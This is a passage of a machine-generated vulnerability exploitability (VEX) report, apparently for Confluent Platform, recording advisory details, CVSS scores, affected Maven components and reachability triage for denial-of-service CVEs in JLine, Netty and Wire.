          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. No CP repository constructs or starts a JLine Telnet server anywhere, so the vulnerable NEW-ENVIRON variable-flooding sink in TelnetIO is never reachable."
      }
    },
    {
      "id": "CVE-2026-56741",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "JLine is a Java library for handling console input. Prior to 3.30.14, 4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not apply an upper bound to terminal dimensions received via the Telnet NAWS option, and TelnetIO.handleNAWS() in TelnetIO.java:856-879 reads client-supplied width and height as 16-bit unsigned integers and passes values such as 65535x65535 to setTerminalGeometry(), allowing an unauthenticated remote attacker to repeatedly alternate values and trigger continuous expensive rendering work that causes CPU exhaustion and denial of service. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1.",
      "recommendation": "Upgrade org.jline:jline-remote-telnet to version 4.2.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56741"
        },
        {
          "url": "https://github.com/jline/jline3"
        },
        {
          "url": "https://github.com/jline/jline3/commit/3ea9cad8699714dc072fade29d36be0d1e23d708"
        },
        {
          "url": "https://github.com/jline/jline3/commit/733eb353dca7b0ea0252e724445b6defa29c393e"
        },
        {
          "url": "https://github.com/jline/jline3/commit/86b7ba7801988aadb1a67555629522a71d603bd3"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2000"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.0.16"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.2.1"
        },
        {
          "url": "https://github.com/jline/jline3/security/advisories/GHSA-2r2c-cx56-8933"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56741"
        }
      ],
      "published": "2026-07-17T22:17:57+00:00",
      "updated": "2026-08-18T15:17:51+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.1",
          "versions": [
            {
              "version": "3.25.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.0",
          "versions": [
            {
              "version": "3.25.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:eb74ed3e-1cd3-4ddb-9fe8-cfa4415d9665/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. No CP repository constructs or starts a JLine Telnet server anywhere, so the vulnerable NAWS terminal-geometry sink in TelnetIO is never reachable."
      }
    },
    {
      "id": "CVE-2026-44891",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.stomp.StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, and the maxLineLength parameter only restricts individual header lines. An attacker can send a large number of short headers that are accumulated in memory inside DefaultStompHeadersSubframe until the JVM throws an OutOfMemoryError, causing denial of service for servers exposing a STOMP endpoint based on StompSubframeDecoder. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-stomp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44891"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44891"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17063"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-vhch-2wf3-m8rp"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44891"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44891"
        }
      ],
      "published": "2026-07-17T21:17:06+00:00",
      "updated": "2026-07-23T13:35:01+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#daf133bc-416d-4da0-ac59-db804e869790"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#8c5b7a87-2f75-4714-8b38-62f9f52196ff"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ec6514c0-f6cc-4503-8a5f-d09edf28087a"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#c44a6acf-8f3e-467a-916f-17243d21a6b1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#d66c92a5-1786-42e0-831c-ff0a95f73a76"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#cbbf95f9-2540-4420-8c0b-584bf7333103"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#ff1f1f0f-4729-4eb9-b5c1-63a9845b49f5"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#e69c714c-52a5-4036-8155-d8c0ed5fc387"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#f101a471-e340-418d-ab7d-83b218d2ee45"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#a53a265c-1866-45f7-8c35-5fe5cf57bd5a"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f4c5fb82-b31f-4202-9413-7f48883585ef"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#b94bc43a-c12c-4fa3-afd4-563d78f424cb"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#97b7bf09-7cc7-46d2-818d-3ae5d6977fc6"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#7fd60386-a34a-4658-89bf-f4700493a101"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-45799",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        129
      ],
      "description": "Wire provides gRPC and protocol buffers for Android, Kotlin, Swift, and Java. Prior to 6.3.0 and 7.0.0-alpha03, ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup() in wire-runtime do not validate that a LENGTH_DELIMITED field length is non-negative before skip(), allowing a crafted protobuf varint encoding -128 as a signed Int to make skip(-128) move the internal position negative and make the next readByte() throw ArrayIndexOutOfBoundsException instead of the documented IOException or ProtocolException, which can crash services using ProtoAdapter.decode(byte[]) on untrusted payloads. This issue is fixed in versions 6.3.0 and 7.0.0-alpha03.",
      "recommendation": "Upgrade com.squareup.wire:wire-runtime-jvm to version 6.3.0, 7.0.0-alpha03",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-45799"
        },
        {
          "url": "https://github.com/square/wire"
        },
        {
          "url": "https://github.com/square/wire/commit/47d5b0dba53935d5332cd41a80a353b3fc90e7b0"
        },
        {
          "url": "https://github.com/square/wire/commit/e4e56fab38a547d9625f05c97f1d8f0bcc3a5773"
        },
        {
          "url": "https://github.com/square/wire/pull/3595"
        },
        {
          "url": "https://github.com/square/wire/pull/3597"
        },
        {
          "url": "https://github.com/square/wire/releases/tag/6.3.0"
        },
        {
          "url": "https://github.com/square/wire/releases/tag/7.0.0-alpha03"
        },
        {
          "url": "https://github.com/square/wire/security/advisories/GHSA-7xpr-hc2w-34m9"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45799"
        }
      ],
      "published": "2026-07-17T20:17:18+00:00",
      "updated": "2026-08-12T19:04:04+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7",
          "versions": [
            {
              "version": "4.9.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:9f11845d-5c4f-4d50-a9ad-2d75f4051d3f/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#87c94cd5-3b17-4f98-923d-61aa7f70f4b5"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#eb55a20b-f3f4-4dfb-b8ed-6ff42a0da2f4"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#70377bca-fd53-4a9e-a4df-32cd3afc35a9"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#46fba8e8-cf89-4b36-8acf-9362ec12a78c"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#c38ef6f7-8359-4df2-a7cf-e5139d325ea6"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f9ca1c01-186e-4fa4-aae5-2e29051168d4"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f8bcec50-3876-4022-8a25-24738e8bd429"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#dcc38cd7-516c-49db-adb2-3e9f2d76fb24"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#dc2e006c-62bc-492d-9287-7da86e0b9083"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#f2d86c58-f6f0-4d8d-b112-aa8a2cf66647"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#fb41292a-6b94-40b8-ba9e-bd604c5b8065"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#efbd9b6b-06b5-40fa-8385-9d40829e605c"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#e4c99385-1875-4bf9-a68e-791b7614aa0a"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-55831",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, Netty's SPDY SETTINGS decoder accepts a peer-declared SETTINGS entry count up to the 24-bit frame-length limit and materializes every unique setting ID in `DefaultSpdySettingsFrame`, allowing a remote SPDY/3.1 peer to send a syntactically valid roughly 2 MiB SETTINGS frame that creates 262144 map entries and amplifies network input into heap growth and ordered-map insertion work. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55831"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55831"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-6jqx-86gh-f27w"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55831"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55831"
        }
      ],
      "published": "2026-07-21T00:17:35+00:00",
      "updated": "2026-07-23T15:17:16+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#e980273a-9a62-4a85-9c2f-8135cf54852a"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#452f36bc-1257-462e-be68-3441357bd4a9"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#e04de41b-97c5-498b-8d15-41f7208e534e"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#6891b98b-ab7c-4a7f-bbcc-d7028d024d43"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#ffca2055-bdcc-48ba-a02b-7f8b4f05e1c5"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#fec8eff5-36f1-4f25-b97e-a7bb4895aca5"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#f15a5acf-0141-412d-9010-ad66c9ccc187"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#a91cdedd-b4a6-4470-838a-22b6acd43058"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#d416ae40-8589-4057-bb2c-448810064092"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f474bdd3-7aa8-4a1a-aba9-80cac6870330"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f747dabd-5f9f-403d-9f5d-4e4b2a0e3bbe"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#eba1d71f-41d0-4939-b973-98bcf343783e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fae2d073-4bb2-4b43-970a-b11ab31288b8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e6dc16b9-c4f8-4bf5-b25e-ce73ea6183e5"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f23f68af-3e1a-4be8-9061-a42dc2e93cb8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c5d787ba-43fb-4c8b-b9b3-ebe7b50afaba"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#c8cfe000-6d4c-41e1-879a-4424e1d781ff"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#da8d2aa8-1d6b-457e-9269-50f2523ab3a3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#85fb2588-e32f-4881-92f4-6260c3e2ba74"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d7243a57-4232-41ee-8221-57f283cc9db2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-55833",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, Netty SPDY header decoding continues inflating zlib-compressed header blocks after the raw header parser has exceeded `maxHeaderSize` and marked the frame truncated in `SpdyFrameCodec`, allowing a remote peer to send a small compressed `HEADERS` block that expands into much larger raw header data and causes compression-amplified CPU and allocation churn. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55833"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55833"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-mvh2-crg5-v77c"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55833"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55833"
        }
      ],
      "published": "2026-07-21T00:17:35+00:00",
      "updated": "2026-07-23T13:34:45+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#e980273a-9a62-4a85-9c2f-8135cf54852a"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#452f36bc-1257-462e-be68-3441357bd4a9"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#e04de41b-97c5-498b-8d15-41f7208e534e"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#6891b98b-ab7c-4a7f-bbcc-d7028d024d43"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#ffca2055-bdcc-48ba-a02b-7f8b4f05e1c5"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#fec8eff5-36f1-4f25-b97e-a7bb4895aca5"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#f15a5acf-0141-412d-9010-ad66c9ccc187"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#a91cdedd-b4a6-4470-838a-22b6acd43058"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#d416ae40-8589-4057-bb2c-448810064092"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f474bdd3-7aa8-4a1a-aba9-80cac6870330"
        },
        {
